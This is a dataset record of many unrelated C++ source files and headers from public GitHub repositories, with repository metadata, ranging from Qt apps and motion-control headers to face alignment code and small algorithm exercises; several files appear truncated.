3f68d5d88a4be3fcd529d71f9d02fade1ec327b2
[]
no_license
sarbanidatta/Wavesight
f438a26767107afd4e7154b10568e559b7a85c90
88d0d7e39f6742bdc272bc36791a8b35483332fa
refs/heads/master
2021-01-19T10:18:28.822113
2017-02-21T09:16:33
2017-02-21T09:16:33
82,174,483
0
0
null
null
null
null
UTF-8
C++
false
false
265
cpp
#include "home.h" #include <QApplication> #include "databaseconnection.h" #include<QIcon> int main(int argc, char *argv[]) { QApplication a(argc, argv); Home w; w.setWindowIcon(QIcon(":wavesight.svg")); w.showMaximized(); return a.exec(); }
[ "sarbanid@spanidea.com" ]
sarbanid@spanidea.com
3020258c9a5af0a62999a9de0361b24065022545
ddd1f1430a2ef9c4cad5a316f062c5132ca1f9aa
/LAB8/Character.cpp
26a0eedf0a7cb6517711d53a3e571a05a80bac81
[]
no_license
jstnf/cs012
6a9633c35e0ddbb4713ca3edfa37b7ddffe6136b
da9e7ad5678b7754cae3d6587aee63204982e36f
refs/heads/master
2020-08-05T11:21:02.822377
2019-12-15T08:24:56
2019-12-15T08:24:56
212,480,140
0
1
null
null
null
null
UTF-8
C++
false
false
611
cpp
using namespace std; #include "Character.h" Character::Character(HeroType type, const string& name, double health, double attack) { this->type = type; this->name = name; this->health = health; attackStrength = attack; } HeroType Character::getType() const { return type; } const string & Characte...
[ "justinbfigueroa@gmail.com" ]
justinbfigueroa@gmail.com
f27a419b3180e503c4fa103d8f3ee79710959e7b
be5a5465b147e0cbb716517c4ed33bc75587a7ed
/gsiot/src/GSIOTClient.cpp
95eba9feb5eee8f33657811bd685c6583d96d968
[]
no_license
asdfjkl697/package
73e012acd7700b8a5aba91c09bf73be74cbe6465
0ca045ae7ae365cddc0f1ed32c213d1c3e32d79b
refs/heads/master
2021-01-01T05:30:03.146238
2017-08-03T08:19:32
2017-08-03T08:19:32
57,017,298
0
0
null
null
null
null
UTF-8
C++
false
false
145,453
cpp
#include "gloox/message.h" //jyc20170222 add #include "gloox/rostermanager.h" //jyc20170224 add #include "GSIOTClient.h" #include "GSIOTInfo.h" #include "GSIOTDevice.h" #include "GSIOTControl.h" #include "GSIOTDeviceInfo.h" #include "GSIOTHeartbeat.h" #include "RS485DevControl.h" #include "RFRemoteControl.h" #i...
[ "[22960468@qq.com]" ]
[22960468@qq.com]
6b8f38c8402dfbc42b7e967b73866983754d492b
e2874eb5e0a7074896799b54035927aaeab584ff
/appln/main_xosc.cxx
35fca58cec3424e29b1835998aa2c8e77714b762
[ "MIT" ]
permissive
qixiaoyu718/ad-xolib
7130ea6d0a3c48bde209f0742b65b1b7ea889ce7
cbb85b1724f622adc771b10aa39b1b1d4a07cb6f
refs/heads/master
2023-02-23T11:41:55.056921
2021-01-19T06:22:08
2021-01-19T06:22:08
null
0
0
null
null
null
null
UTF-8
C++
false
false
428
cxx
#include <cstdio> #include <config.h> #include "xosc.h" int main (int argc , char **argv) { std::string filename = (argc > 1 ? argv[1]: std::string(__DATA_DIR__)+"/TrafficJam.xosc"); std::cout<<"Loading filename .. "<<filename<<std::endl; xosc _osc; _osc.load(filename); _osc.parse(); _o...
[ "javedulu@gmail.com" ]
javedulu@gmail.com
3302fa8edc76674f2a31f8b9fbf4aea3de7d0d08
9cda69cd2732e93b6db6954eeb9caf1ad8078a5b
/cpp_04/ex02/AssaultTerminator.hpp
f46e0425613cc059543fe24115409d90b7369b04
[]
no_license
farhod-rahimov/cpp_modules
b96c56cadf797319b794a4a8395503009ae14682
e4994911dca457699df67a7013411b5b6d98152a
refs/heads/master
2023-08-05T19:59:31.536196
2021-09-09T08:42:27
2021-09-09T08:42:27
358,210,264
0
0
null
null
null
null
UTF-8
C++
false
false
548
hpp
#ifndef ASSAULT_TERMINATOR_HPP # define ASSAULT_TERMINATOR_HPP #include "ISpaceMarine.hpp" class AssaultTerminator : public ISpaceMarine { public: AssaultTerminator(); virtual ~AssaultTerminator(); AssaultTerminator(AssaultTerminator const &src); AssaultTerminator &operator=(AssaultTerminator con...
[ "farhod.rahimov0055@gmail.com" ]
farhod.rahimov0055@gmail.com
09d11e12fe0426746022114002fc28bf24aa6929
41da2db535357b85a388d614afc69cc89d251d6f
/turtle/include/CML_Linkage.h
99445b6bef5f8d167e5c02710a483f6d711e2b57
[]
no_license
weili666/simple_kinova
5b24935d08f53a652099f8eb10dbdc068b8274ad
6b31b2751423043cd550b6be438ca4d532bb31ec
refs/heads/master
2022-12-08T07:24:31.184409
2020-09-01T06:56:35
2020-09-01T06:56:35
103,649,363
2
1
null
null
null
null
UTF-8
C++
false
false
16,703
h
/********************************************************/ /* */ /* Copley Motion Libraries */ /* */ /* Copyright (c) 2002 Copley Controls Corp. */ /* ...
[ "li_wei_666@163.com" ]
li_wei_666@163.com
6f3d1779c28c6b981bac6deef16ff3f42ad8d1e5
2bae07914bcd383fefe415194ffb63e2b007aff2
/engine/modules/graveyard/ui/include/tiki/ui/uielement.hpp
2aac0d10e5121fd1f9229321db07a7c828a90fe0
[]
no_license
TikiTek/mechanica
ec4972b541bfb7dc685b0b7918785c5ca99622d2
d151a818a279f1969b977ff7a935148b18ab9546
refs/heads/master
2021-10-09T07:27:23.308704
2021-10-08T07:42:04
2021-10-08T07:42:04
71,704,579
1
0
null
null
null
null
UTF-8
C++
false
false
3,784
hpp
#pragma once #ifndef TIKI_UIELEMENT_HPP_INCLUDED #define TIKI_UIELEMENT_HPP_INCLUDED #include "tiki/base/types.hpp" #include "tiki/container/linkedlist.hpp" #include "tiki/graphics/color.hpp" #include "tiki/math/thickness.hpp" #include "tiki/math/vector.hpp" #include "tiki/ui/uitypes.hpp" namespace tiki { class Font...
[ "mail@timboden.de" ]
mail@timboden.de
78274999157f279278ce3f0e2710e7e5a0cf7080
103334e96ff598bad3b805861d4f9750220f7363
/FaceAlignment/Fern.cpp
ce86b7ab8b4d4f2a98d8c88435d4860923211bba
[ "MIT" ]
permissive
Amos-zq/FaceAlignment
6e12da26e608a9ec5c588b627508f9185a423718
21ea6851af21484009ee56149976d974046c8a28
refs/heads/master
2021-01-17T23:09:20.497359
2014-06-21T08:22:19
2014-06-21T08:22:19
null
0
0
null
null
null
null
UTF-8
C++
false
false
10,352
cpp
/* Author: Bi Sai Date: 2014/06/18 This program is a reimplementation of algorithms in "Face Alignment by Explicit Shape Regression" by Cao et al. If you find any bugs, please email me: soundsilencebisai-at-gmail-dot-com Copyright (c) 2014 Bi Sai The MIT License (MIT) Permission is hereby granted, free of charge, t...
[ "soundsilencebisai@gmail.com" ]
soundsilencebisai@gmail.com
5a9c755b3f727969820a9ee1973a0b0f35f113cd
2a9c42ba191439267610c40dbb46fca8ebbbf8cc
/idle.cpp
5b29ad6349d3f992f6a324c5f27935b0045f7f7d
[]
no_license
pavlepopovic/OS1
9e62bb34220722f110220e7ba693a34b28ab3e13
fa8029243e9792685613ecf73a804da86e858300
refs/heads/master
2020-03-18T22:05:19.017885
2018-10-28T18:10:37
2018-10-28T18:10:37
135,323,928
0
0
null
null
null
null
UTF-8
C++
false
false
325
cpp
/* * idle.cpp * * Created on: Aug 22, 2018 * Author: OS1 */ #include "idle.h" #include <iostream.h> void IdleThread::run() { for (int i = 0; i < 100 ; i++) { //cout << "In idle thread\n"; if (i == 90) i = 0; for (int j = 0 ; j < 30000; j++) for (int k =0; k < 30000; k++); } } ...
[ "noreply@github.com" ]
pavlepopovic.noreply@github.com
551da053547cf21110b3737ec89237c986f90f83
709f1a17d4ef690cfcbbee82bf2ea5e341db1d6c
/qatspy.cpp
e1400f20f87b25f04c68d8f90ef1d3efdcc7b3b8
[ "MIT" ]
permissive
mirsakhawathossain/qatspy
6a503554aef205b568984dad4364ceb1a792ab09
975d18bf1c35b8204a0df3a5d95786acf4cfa70e
refs/heads/master
2020-04-14T03:04:35.689068
2017-07-19T19:46:25
2017-07-19T19:46:25
null
0
0
null
null
null
null
UTF-8
C++
false
false
3,511
cpp
#include <iostream> #include <pybind11/pybind11.h> #include <pybind11/numpy.h> #include <qats.h> namespace py=pybind11; py::array_t<double> shConvol_wrapper(py::array_t<double> y, int q) { // // shConvol: convolves the data, y, comprised of N datum, with a box of unit // depth (or height -- see PARITY in qats.c...
[ "lgbouma@mit.edu" ]
lgbouma@mit.edu
ca9bc3d62de732d67bbfc1a31e9af03b2dc4edfa
243af6f697c16c54af3613988ddaef62a2b29212
/firmware/uvc_controller/mbed-os/features/frameworks/utest/source/unity_handler.cpp
f0d4b9e80ad86eb0799779d3517aa0f6a741b479
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "LicenseRef-scancode-public-domain", "BSD-2-Clause", "MIT" ]
permissive
davewhiiite/uvc
0020fcc99d279a70878baf7cdc5c02c19b08499a
fd45223097eed5a824294db975b3c74aa5f5cc8f
refs/heads/main
2023-05-29T10:18:08.520756
2021-06-12T13:06:40
2021-06-12T13:06:40
376,287,264
1
0
null
null
null
null
UTF-8
C++
false
false
1,381
cpp
/**************************************************************************** * Copyright (c) 2015, ARM Limited, All Rights Reserved * SPDX-License-Identifier: Apache-2.0 * * Licensed under the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * ...
[ "13125501+davewhiiite@users.noreply.github.com" ]
13125501+davewhiiite@users.noreply.github.com
c7a21280f9185f42e428ea77147752764070d9fd
0f6032b1a6124264f74314b9a959955acd591adf
/src/Components/PlaneGenerator/PlaneGenerator.cpp
1d33190180c40324e70f848d1999135d44b351ca
[]
no_license
maciek-slon/DoorOpening
9737262e52351fca63fb004a3f652684cc7fe511
a5b81f3abf50ef1f4d6bd300ba15b989a4f791ab
refs/heads/master
2020-05-30T18:29:49.061188
2016-02-25T17:03:48
2016-02-25T17:03:48
14,430,285
0
0
null
null
null
null
UTF-8
C++
false
false
1,279
cpp
/*! * \file * \brief * \author Maciej Stefanczyk */ #include <memory> #include <string> #include "PlaneGenerator.hpp" #include "Common/Logger.hpp" #include <boost/bind.hpp> namespace Processors { namespace PlaneGenerator { PlaneGenerator::PlaneGenerator(const std::string & name) : Base::Component(name) , ...
[ "maciek.slon@gmail.com" ]
maciek.slon@gmail.com
702312b02c4f379eb2bcccfcc1c3933630be7af2
410de6fc1ef54edbc4e7485a642bdaf69c44ae64
/src/MinimumWindowSubstring.hpp
828b0da41aba31798bd5928ce56992e4131005b8
[]
no_license
SaberQ/leetcode
322092c03b036bee053c794ebaa3dafef413a5b3
63f8abb9c382a2cbcea1e0294746a37fc86a293e
refs/heads/master
2020-12-11T09:30:23.950830
2015-10-13T08:01:24
2015-10-13T08:01:24
null
0
0
null
null
null
null
UTF-8
C++
false
false
238
hpp
#ifndef MINIMUM_WINDOW_SUBSTRING_HPP_ #define MINIMUM_WINDOW_SUBSTRING_HPP_ #include <string> using namespace std; class MinimumWindowSubstring { public: string minWindow(string s, string t); }; #endif // MINIMUM_WINDOW_SUBSTRING_HPP_
[ "yanzhe.cn@gmail.com" ]
yanzhe.cn@gmail.com
81452346325b05dd959580407ad50b3927272d49
0d515604fb54104c01fdcd1f5bc37768fadcdbaa
/tests/unit/statistics/QuadraticTimeMMD_unittest.cc
9ff794e3a9cdcf1c64d21574fbe7c29e8706d89c
[]
no_license
changguanghua/shogun
a3083f0331d4e75dc0f9e9d94ba15c1087a600f8
dd324691ef7b36451b82357ee8295e5f40799086
refs/heads/master
2021-01-25T02:29:24.290701
2013-03-08T21:47:48
2013-03-08T21:47:48
null
0
0
null
null
null
null
UTF-8
C++
false
false
10,770
cc
/* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * Written (W) 2012-2013 Heiko Strathmann */ #include <shogu...
[ "heiko.strathmann@gmail.com" ]
heiko.strathmann@gmail.com
beb80287776090e66a3d844fc89ad9ce05a8cdf8
cfc920c6f428a0bb92b430448df4af38cd7bc971
/Head First/适配器模式 Adapter Pattern/对象适配器/code/wildturkey.cpp
7b3a8cbbd326e2eab2135d45d5cf721ec3ad42fd
[]
no_license
whywhywhywhygo/Design-Patterns
386af210fdce40462bbbd967bd2a8487caac4a89
8d89569890277df6955569258be4d1dce5ef52af
refs/heads/master
2020-04-28T14:44:19.315438
2019-04-02T01:12:53
2019-04-02T01:12:53
175,347,250
0
0
null
null
null
null
UTF-8
C++
false
false
255
cpp
// // Created by gaojian on 18-10-21. // #include "wildturkey.h" #include <iostream> using std::cout; using std::endl; void WildTurkey::gobble() { cout << "Wild turkey gobble" << endl; } void WildTurkey::fly() { cout << "Wild turkey fly" << endl; }
[ "whywhywhywhygo@gmail.com" ]
whywhywhywhygo@gmail.com
1235ec8df717da17b3b7535f6ac6a1fd9fbc69ad
ce27b3790f7f7e4fa0fb6e68e693dac39a15d40f
/include/DistDeque.h
8cf38d488d70e33145fa4c4c04edfc05197ed8e4
[]
no_license
flybird119/ffead-cpp
4cadfc38dd0702a8eda0ef0b8348f0e693e57bc9
d38f4d864b485d5fef2f79287a5b69840ddfc585
refs/heads/master
2020-05-31T00:11:00.932391
2014-08-28T14:18:07
2014-08-28T14:18:07
null
0
0
null
null
null
null
UTF-8
C++
false
false
4,307
h
/* Copyright 2009-2013, Sumeet Chhetri Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agre...
[ "sumeet.chhetri@gmail.com" ]
sumeet.chhetri@gmail.com
488a5ba93d9b53574820a056d8730b233670d08e
0f086c65a1ac30c5a5743684f6efb144b03e8989
/acmstruggler/16771.cpp
332d2e20a7d75aaed29225cdc915873477372608
[]
no_license
Solomonwisdom/ForthStruggler
29d70efc489d39269c490e09357bbcab4cb4fc52
54babfa1934073115fc634bdfb4ae54f36049dab
refs/heads/master
2021-09-16T03:08:15.528525
2018-06-15T10:43:00
2018-06-15T10:43:00
103,479,413
0
0
null
null
null
null
UTF-8
C++
false
false
1,469
cpp
////////////////////System Comment//////////////////// ////Welcome to Hangzhou Dianzi University Online Judge ////http://acm.hdu.edu.cn ////////////////////////////////////////////////////// ////Username: acmstruggler ////Nickname: acmstruggler ////Run ID: ////Submit time: 2015-07-21 15:39:46 ////Compiler: Vis...
[ "whg19962015@163.com" ]
whg19962015@163.com
7df34ef0fdc59b66579f0d9bc1bad63b19ae043d
a75bfdb61d2bfa20f71d2a1548188db18a8e5e6d
/Codeforces/369/d.cpp
99c95b9bbf2c0016235a864db7ae2ac953e5f485
[]
no_license
Ra1nWarden/Online-Judges
79bbe269fd35bfb1b4a5b3ea68b806fb39b49e15
6d8516bb1560f3620bdc2fc429863a1551d60e6a
refs/heads/master
2022-05-01T17:50:00.253901
2022-04-18T06:55:25
2022-04-18T06:55:25
18,355,773
0
0
null
null
null
null
UTF-8
C++
false
false
938
cpp
#include <cstdio> #include <cstring> using namespace std; const int maxn = 200000; const int mod = 1000000007; int mods[maxn+5]; int v[maxn+5], visited[maxn+5], d[maxn+5]; int n, f; void init() { mods[0] = 1; for(int i = 1; i <= maxn; i++) { mods[i] = (mods[i-1] * 1LL * 2) % mod; } } int main() { init()...
[ "wzh19921016@gmail.com" ]
wzh19921016@gmail.com
7b97aaed8829012cd53da28ae9f10c947e38730a
9bdd58cc75b495e67ec6c186802c81121199c064
/amsr-vector-fs-communicationmiddleware/src/someipd-posix/service_discovery/connection_manager/transmission_trigger/transmission_trigger_policy_manager.cc
9dc5615ec621accf62659902178ddc1219505a6c
[]
no_license
flankersky/vector_ap_bsw
3bac290b569dd2f72d4d4971fcb8f96b8e188914
b8f667356126a4f76a79109b02ee14ae1cd16a58
refs/heads/master
2022-01-14T03:38:29.499494
2019-07-04T04:15:02
2019-07-04T04:15:02
null
0
0
null
null
null
null
UTF-8
C++
false
false
4,035
cc
/********************************************************************************************************************** * COPYRIGHT * ------------------------------------------------------------------------------------------------------------------- * \verbatim * Copyright (c) 2018 by Vector Informatik GmbH. Al...
[ "catfish416@126.com" ]
catfish416@126.com
33abe0d718cefb8e7b9cd0aba2f295f18eda3b41
04b1803adb6653ecb7cb827c4f4aa616afacf629
/ui/views/animation/ink_drop_highlight.cc
866c68baa94635d13e0a554caafff835e6e51881
[ "BSD-3-Clause" ]
permissive
Samsung/Castanets
240d9338e097b75b3f669604315b06f7cf129d64
4896f732fc747dfdcfcbac3d442f2d2d42df264a
refs/heads/castanets_76_dev
2023-08-31T09:01:04.744346
2021-07-30T04:56:25
2021-08-11T05:45:21
125,484,161
58
49
BSD-3-Clause
2022-10-16T19:31:26
2018-03-16T08:07:37
null
UTF-8
C++
false
false
7,480
cc
// Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "ui/views/animation/ink_drop_highlight.h" #include <memory> #include <string> #include <utility> #include "base/bind.h" #include "third_party/s...
[ "sunny.nam@samsung.com" ]
sunny.nam@samsung.com
46e120704a8dc6a179c9728a6e3fabf22d3a3c95
319f8a258660eb7f8ed7f3fdfaca522f8016d52b
/RangeChar.cpp
14aa96440370d26c8e85fa86b6711216a0865dbc
[]
no_license
17dx/7zip
48255d09f889d81a4afcba9df21830f4adfc962f
674d70b58c337d2b10a5aa388cdd9abafd3c10cb
refs/heads/master
2021-01-01T17:53:29.113997
2017-07-24T13:04:08
2017-07-24T13:04:08
98,188,420
1
0
null
null
null
null
UTF-8
C++
false
false
2,727
cpp
#include "RangeChar.h" #include <sstream> // для stringstream #include <algorithm> // для find CRangeChar::CRangeChar(const CRangeChar & obj) { charRange=obj.charRange; minValue=obj.minValue; maxValue=obj.maxValue; charRangeAsString=obj.charRangeAsString; value=minValue; }; CRangeChar::CRangeChar(str...
[ "power_words@mail.ru" ]
power_words@mail.ru
e0cd40075c4ad90347c478943fbcfaf16ff7a61b
933d89d2ebe1c59d86e517c7d2e0a83c7c5c2709
/Solitario/stdafx.cpp
bee557daa6af5c1882f8cd5cd69fdb9288cd5c8d
[]
no_license
CarlosEscobar/EstructuraDeDatos
9306a51c8418a8cf126508a63e418e237b5f6536
1656be8e9a4e535ca2752ee6bcf97a2fa9427a84
refs/heads/master
2021-01-02T08:09:47.452994
2014-02-18T14:45:49
2014-02-18T14:45:49
null
0
0
null
null
null
null
UTF-8
C++
false
false
202
cpp
// stdafx.cpp : source file that includes just the standard includes // Solitario.pch will be the pre-compiled header // stdafx.obj will contain the pre-compiled type information #include "stdafx.h"
[ "cai_escobar@hotmail.com" ]
cai_escobar@hotmail.com
7a5a794bd28ccea6e8047b56822b602e896de380
408271e09e88805b01f191c8ac27ba0b5e07f68a
/src/FBlur.cpp
69b2cea48384b4911b8d58648ffd2e4d725c8977
[]
no_license
KanikaPuri/PhotoShop-Application-in-C-
d3234894d2fda8a4a11f68e38e32543a44fa2362
b622d4c5a4f7b7abb8b2593d0010c140ce634ded
refs/heads/master
2021-01-18T01:58:35.389164
2015-04-08T17:37:00
2015-04-08T17:37:00
33,621,585
0
1
null
null
null
null
UTF-8
C++
false
false
280
cpp
// // FBlur.cpp // PhotoShop Proj // // Created by Seth Johnson on 4/2/15. // Copyright (c) 2015 Seth Johnson. All rights reserved. // #include "FBlur.h" #include "KGaussian.h" FBlur::FBlur(float amount) { m_convolveAlpha = true; m_kernel = new KGaussian(amount); }
[ "purix021@umn.edu" ]
purix021@umn.edu
3ace426b10d0f84e9efcfba718e3747416149362
0fbb4e4f941a50802309f3247822d0e139239fad
/ARace.hh
485aa5aa3a6676db7f2e1560f6c172ab1bdf67aa
[]
no_license
DWaze/Apprentice
b7328b101a01d10dfea5db3b39dcdf4e98273b2d
9c7a5272ec14a9743377485da2ee83b6f86bdf42
refs/heads/master
2023-01-11T18:05:29.777457
2020-11-02T08:51:33
2020-11-02T08:51:33
309,310,019
1
0
null
null
null
null
UTF-8
C++
false
false
322
hh
// // Created by dredhat on 30/10/2020. // #ifndef APPRENTICE_ARACE_HH #define APPRENTICE_ARACE_HH #include "IRace.hh" class ARace: public IRace { public: explicit ARace(int lifeExpectancy); private: int _lifeExpectancy; public: const int & GetLifeExpectancy() override; }; #endif //APPRENTICE_ARACE_H...
[ "wazeproo@gmail.com" ]
wazeproo@gmail.com
ac7cc9ffc9226a32854f5533c84a11d3328bf0fb
9a3b9d80afd88e1fa9a24303877d6e130ce22702
/src/Providers/UNIXProviders/ZoneService/UNIX_ZoneService_AIX.hxx
3b571b874b860ac549f2e95412b426acd7ea3ef3
[ "MIT" ]
permissive
brunolauze/openpegasus-providers
3244b76d075bc66a77e4ed135893437a66dd769f
f24c56acab2c4c210a8d165bb499cd1b3a12f222
refs/heads/master
2020-04-17T04:27:14.970917
2015-01-04T22:08:09
2015-01-04T22:08:09
19,707,296
0
0
null
null
null
null
UTF-8
C++
false
false
1,805
hxx
//%LICENSE//////////////////////////////////////////////////////////////// // // Licensed to The Open Group (TOG) under one or more contributor license // agreements. Refer to the OpenPegasusNOTICE.txt file distributed with // this work for additional information regarding copyright ownership. // Each contributor lice...
[ "brunolauze@msn.com" ]
brunolauze@msn.com
14ee7feef0f383157b51fea276a054b4ce55f6aa
d5b6d9a9263cef8111e8835e92763b8922bb3155
/chapter.06/test.07.cpp
ffdd1537642dc7e2764c200b350b471786597bf3
[]
no_license
goodpaperman/guide
df01b7271535c5906a54b95f3fd1a26b9647ba2b
40fecd13a40b1c3327e2a630b03a8de8ff57762e
refs/heads/master
2020-05-30T11:01:14.247642
2019-06-01T03:49:17
2019-06-01T03:49:17
189,687,421
0
0
null
null
null
null
UTF-8
C++
false
false
491
cpp
#include <iostream.h> namespace MySpace1 { int x = 30; void fun() { cout << "MySpace1::fun() called" << endl; } void fun(int i) { cout << "MySpace1::fun(int) called" << endl; } } namespace MySpace2 { int y = 5; void fun() { cout << "MySpace2::fun() called" << endl; } void fun(int i) { cout ...
[ "haihai107@126.com" ]
haihai107@126.com
c6fd6ba0c628514a5a360c85f5dcee417f764f84
ad934eeba2ac2a3c1d49b02af864790ece137034
/Training/20160817训练赛/fzu1627.cpp
f52932f08d0d3efc8759cb4a5c22893b412e314a
[]
no_license
xiang578/acm-icpc
19b3d8c7771b935293749f5ccad0591cde8fc896
6f2fdfc62bd689842c80b1caee2d4caf8162d72f
refs/heads/master
2022-01-12T12:28:43.381927
2022-01-12T04:20:44
2022-01-12T04:20:44
39,777,634
0
0
null
null
null
null
UTF-8
C++
false
false
1,158
cpp
#include<stdio.h> #include<string.h> #include<algorithm> using namespace std; const int M=10000; int N,m; struct Matrix { int mp[105][105]; Matrix() { memset(mp,0,sizeof(mp)); } }; Matrix Mul(Matrix a,Matrix b) { int i,j,k; Matrix c; for(i=0; i<N; i++) for(j=0; j<N; j++) ...
[ "xiang578@foxmail.com" ]
xiang578@foxmail.com
e8d885317e3ccbce97d67d0932a3267b65787ed9
b5f4445d04f6d75f50ab63c4174393ad9ad6102a
/VisualScriptPinInstance.cpp
6908f2bcf7ddc3c2a58a44d858a5189a03ecdaad
[]
no_license
ebithril/Script
ab4e41a0366f4c4a3666633ef0ad303d7435c7e0
178183db9134731c46bc4083960a02583e24e884
refs/heads/master
2021-01-10T12:25:37.357942
2016-01-12T16:00:57
2016-01-12T16:00:57
47,623,564
0
0
null
null
null
null
UTF-8
C++
false
false
1,637
cpp
#include "ScriptPrecompiled.h" #include "VisualScriptPinInstance.h" #include "VisualScriptPin.h" #include "VisualScriptNodeInstance.h" #include <assert.h> #include "../include/lua.hpp" namespace Script { VisualScriptPinInstance::VisualScriptPinInstance() { } VisualScriptPinInstance::~VisualScriptPinInstance() ...
[ "stpago1@hermods.local" ]
stpago1@hermods.local
52c6e16f92e2ea1a922339d093fd462f36918fb0
e2db68c85e87d010a0ea2bdb51063e23e03508f4
/Minigin/EngineTestScene.h
c2caf47dd1c85e0e381623c3b809ced1ffecbe92
[]
no_license
WLLMGS/Minigin2
3a8c1cbb6cc581e23e065b9e867f6a8ece8d2aff
82b9d0d1a3376b56cf32f0329c867bd7afc3bc21
refs/heads/master
2020-03-14T03:05:24.335355
2018-04-28T13:41:27
2018-04-28T13:41:27
131,412,852
0
0
null
null
null
null
UTF-8
C++
false
false
412
h
#pragma once #include "Scene.h" #include "TextObject.h" #include "GameObject.h" #include "GameActor.h" #include "TextComponent.h" class EngineTestScene : public dae::Scene { public: EngineTestScene(); ~EngineTestScene(); virtual void Update(float elapsedSec) override; private: TextComponent* m_pFpsComp = nullptr...
[ "willem.gos@hotmail.com" ]
willem.gos@hotmail.com
00328dfd8b4fe9b70c4d335ccbeb271c1337dbe7
1c309b8140cfcebaabe5333cc2c33884c3e9c155
/Widgets/UserPageWidget.cpp
4a8290513ac9f30adc0922a5c3b49d8c94b8b42c
[]
no_license
MonoKelvin/BookStudyApp
f64b4cec5ea8c09c008555c463eec8b33071156a
fa9d23c8cb06fb89910fd9c16352f2b34297d576
refs/heads/master
2020-08-31T19:07:17.324979
2019-12-07T13:54:51
2019-12-07T13:54:51
218,762,559
0
0
null
null
null
null
UTF-8
C++
false
false
840
cpp
#include "UserPageWidget.h" #include "ui_UserPageWidget.h" #include "Utility/Utility.h" #include "Utility/AttachHeader.h" UserPageWidget::UserPageWidget(QWidget *parent) : QDialog(parent), ui(new Ui::UserPageWidget) { ui->setupUi(this); AttachHeader::attach("用户详情", this, ui->frameBackground); c...
[ "15007083506@qq.com" ]
15007083506@qq.com
ca8b23c3473da2864d0ce4bc991a27881ff8fc9a
8191864909f7d8b896f97ff353ce475757f4fbd1
/deps/chakrashim/core/lib/Backend/arm64/EncoderMD.cpp
088f644c78e7ada80a3c65c4f818aa5505d77bb5
[ "MIT", "BSD-3-Clause", "LicenseRef-scancode-unicode", "LicenseRef-scancode-openssl", "LicenseRef-scancode-unknown-license-reference", "Artistic-2.0", "NAIST-2003", "NTP", "ICU", "ISC", "Zlib", "LicenseRef-scancode-public-domain", "BSD-2-Clause" ]
permissive
mozilla/spidernode
df5a1e58b54da5bfbc35a585fc4bbb15678f8ca0
aafa9e5273f954f272bb4382fc007af14674b4c2
refs/heads/master
2023-08-26T19:45:35.703738
2019-06-18T19:01:53
2019-06-18T19:01:53
55,816,013
618
69
NOASSERTION
2019-06-18T18:59:28
2016-04-08T23:38:28
JavaScript
UTF-8
C++
false
false
788
cpp
//------------------------------------------------------------------------------------------------------- // Copyright (C) Microsoft. All rights reserved. // Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. //---------------------------------------------------------...
[ "Kunal.Pathak@microsoft.com" ]
Kunal.Pathak@microsoft.com
98d1ac01737af78fb84a3f87fe5be806bebff97f
73cfd700522885a3fec41127e1f87e1b78acd4d3
/_Include/boost/fusion/mpl/has_key.hpp
d84cfb6083f3527448076f84c136eeb47eb4c876
[ "BSL-1.0" ]
permissive
pu2oqa/muServerDeps
88e8e92fa2053960671f9f57f4c85e062c188319
92fcbe082556e11587887ab9d2abc93ec40c41e4
refs/heads/master
2023-03-15T12:37:13.995934
2019-02-04T10:07:14
2019-02-04T10:07:14
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,094
hpp
/*============================================================================= Copyright (c) 2001-2011 Joel de Guzman Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) ===================================...
[ "langley.joshua@gmail.com" ]
langley.joshua@gmail.com
5f3773c80ab4eae3adb5605357bd9f5b41e36ad9
55c696d57dd60c4022a91a6af8b49b104544a0a3
/0_1 KnapSack.cpp
67f2702cf7fde17180caa92c381ac85b95bfd6c3
[]
no_license
SouravGolder/0_1-KnapSack
a645ad9dbd41e62b883296ed6d17cf5f2c97e2aa
deec8b402cea74c3c189abbfadd14212721c17b4
refs/heads/master
2020-09-07T15:20:14.510238
2019-11-10T17:38:48
2019-11-10T17:38:48
220,825,759
0
0
null
null
null
null
UTF-8
C++
false
false
652
cpp
#include <iostream> using namespace std; int Max(int x, int y); int main() { int wt[5]= {0,3,5,6,4}; int p[5]= {0,2,4,1,3}; int m=8,i,w,ar[5][9]; for(i=0; i<=4; i++) { for(w=0; w<=m; w++) { if(i==0 || w==0) ar[i][w]=0; else ...
[ "noreply@github.com" ]
SouravGolder.noreply@github.com
8681c27424ca23de7ad41573928399619efd1abb
6d258d9abc888d6c4640b77afa23355f9bafb5a0
/eigen/src/hello_eigen.cpp
d9072f840e214c17779adf76e307f890119d79f4
[]
no_license
ohwada/MAC_cpp_Samples
e281130c8fd339ec327d4fad6d8cdf4e9bab4edc
74699e40343f13464d64cf5eb3e965140a6b31a2
refs/heads/master
2023-02-05T00:50:47.447668
2023-01-28T05:09:34
2023-01-28T05:09:34
237,116,830
15
1
null
null
null
null
UTF-8
C++
false
false
442
cpp
/** * hello_eigen.cpp * 2022-06-01 K.OHWADA */ // reference : https://qiita.com/yohm/items/a03006790dc1e54a87be // g++ hello_eigen.cpp -o hello -I /usr/local/include/eigen3 #include <iostream> #include <Eigen/Dense> using Eigen::MatrixXd; /** * main */ int main() { MatrixXd m(2,2); m(0,0) = 3; m(1,0) ...
[ "ml.ohwada@gmail.com" ]
ml.ohwada@gmail.com